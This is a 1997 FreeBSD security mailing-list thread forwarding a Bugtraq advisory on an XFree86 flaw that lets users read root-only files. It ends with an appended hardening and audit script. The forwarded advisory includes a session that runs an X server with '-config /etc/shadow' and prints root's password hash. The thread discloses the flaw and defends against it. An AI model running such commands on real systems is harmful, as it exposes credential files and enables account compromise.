Date: Sun, 23 Nov 1997 13:20:20 -0500 (EST)
From: spork <spork@super-g.com>
To: David Dawes <dawes@rf900.physics.usyd.edu.au>
Cc: Philippe Regnauld <regnauld@deepo.prosa.dk>, freebsd-security@FreeBSD.ORG
Subject: Re: Fwd: "XFree86 insecurity" <root@SHEGG.RH1.IIT.EDU>
Message-ID: <Pine.BSF.3.96.971123131801.1101A-100000@super-g.inch.com>
In-Reply-To: <19971122192453.17451@rf900.physics.usyd.edu.au>
A quick fix I already had in place from the old xterm exploits was to put
all the people that use X (well, just me) in a group and make the X
binaries with suid bits only executable by that group rather than
world-execute. While it's not truly a fix, it does limit your
vulnerability. I've yet to play with XDM...
Charles Sprickman
spork@super-g.com
----
"I'm not a prophet or a stone-age man
Just a mortal with potential of a superman
I'm living on" -DB
On Sat, 22 Nov 1997, David Dawes wrote:
> On Sat, Nov 22, 1997 at 08:23:50AM +0100, Philippe Regnauld wrote:
>
> We (XFree86) are aware of this one. I agree with the recommendation of
> removing the setuid bit and using xdm to start the Xserver, and if you
> have XFree86 on a machine where this problem is significant, you should
> consider doing this.
>
> The fix is to disable the '-config' Xserver option. This will be removed
> in our next release, and also in the next X11 release from The Open
> Group. It was only added to get around problems on OS's with small
> command line length limits, and should never have been enabled for most
> Unix-like OSs. The problem isn't XFree86-specific. It affects any
> platform using X11R6 XC/TOG code where the Xserver is installed setuid
> root (although on non-XFree86 platforms you may need to be a little more
> inventive with the use of the -config option).
>
> David
>
> >Cute one.
> >
> >-----Forwarded message from shegget <root@SHEGG.RH1.IIT.EDU>-----
> >
> >Date: Fri, 21 Nov 1997 18:35:36 +0000
> >From: shegget <root@SHEGG.RH1.IIT.EDU>
> >Subject: XFree86 insecurity
> >To: BUGTRAQ@NETSPACE.ORG
> >
> > plaguez security advisory n.10
> >
> > XFree86 insecurity
> >
> >Program: XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)
> >
> >Version: Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
> > Other versions as well.
> >
> >OS: All
> >
> >Impact: The XFree86 servers let you specify an alternate configuration
> > file and do not check whether you have rights to read it.
> > Any user can read files with root permissions.
> >
> >hello,
> >just a short one to tell you about this "feature" I found in all default
> >XFree86 servers...
> >
> >
> >Here it is:
> >
> >Script started on Sat Aug 23 15:32:36 1997
> >Loading /usr/lib/kbd/keytables/fr-latin1.map
> >[plaguez@plaguez plaguez]$ uname -a
> >Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
> >[plaguez@plaguez plaguez]$ ls -al /etc/shadow
> >-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
> >[plaguez@plaguez bin]$ id
> >uid=502(plaguez) gid=500(users) groups=500(users)
> >[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
> >[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
> >Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
> >use: X [:<display>] [option]
> >-a # mouse acceleration (pixels)
> >-ac disable access control restrictions
> >-audit int set audit trail level
> >-auth file select authorization file
> >bc enable bug compatibility
> >-bs disable any backing store support
> >-c turns off key-click
> >
> >... and so on. HINT: look at the first XF86_SVGA output line.
> >
> >Patch:
> >------
> >
> >If you run xdm, you should consider removing the setuid bit of the
> >servers.
> >
> >If not, well, wait for the XFree86 Project to bring you a patch, since I'm
> >too lazy to find and fix it.
> >
> >later,
> >
> >-plaguez
> >dube0866@eurobretagne.fr
> >
> >-----End of forwarded message-----
> >
> >--
> > -- Phil
> >
> > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]-
>
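The group-restriction workaround Charles describes at the top of this message (keep the servers setuid, but strip world-execute and hand them to a dedicated group so only its members can launch them), written out as an added shell example that is not from the thread. It assumes the servers live in /usr/X11R6/bin and are named XF86_*, and that a group named xusers already exists; both are overridable via X_BINDIR and X_GROUP.

```shell
#!/bin/sh
# Added example: restrict setuid XF86_* servers to one group and audit the result.
# Assumed defaults (not from the thread): X_BINDIR=/usr/X11R6/bin, X_GROUP=xusers.

# Print every XF86_* server in $1 that is still setuid AND world-executable.
# -perm -4001: both the setuid bit (4000) and the other-execute bit (0001) set.
find_world_exec_setuid() {
    find "$1" -type f -name 'XF86_*' -perm -4001
}

# Restrict every setuid XF86_* server in $1 to group $2:
# chgrp to the group, then mode 4710 = setuid, owner rwx, group x, others none.
# The setuid bit stays, so the server still works for group members.
restrict_x_servers() {
    dir=$1; grp=$2
    find "$dir" -type f -name 'XF86_*' -perm -4000 | while read -r f; do
        chgrp "$grp" "$f" && chmod 4710 "$f" || return 1
        echo "restricted: $f"
    done
}

# Audit check for cron or a login script: succeed (0) only when no XF86_*
# server in $1 is both setuid and executable by everyone.
audit_x_servers() {
    bad=$(find_world_exec_setuid "$1")
    if [ -n "$bad" ]; then
        printf 'setuid X servers still world-executable:\n%s\n' "$bad" >&2
        return 1
    fi
    return 0
}

# Usage: ./restrict-x.sh --apply   (restrict, then audit)
#        ./restrict-x.sh --audit   (audit only)
if [ $# -gt 0 ]; then
    bindir=${X_BINDIR:-/usr/X11R6/bin}
    [ "$1" = "--apply" ] && restrict_x_servers "$bindir" "${X_GROUP:-xusers}"
    audit_x_servers "$bindir"
fi
```

The audit only catches the world-execute half of the problem; the `-config` file-read issue itself remains for anyone in the group, which is why David recommends dropping the setuid bit entirely and starting the server from xdm.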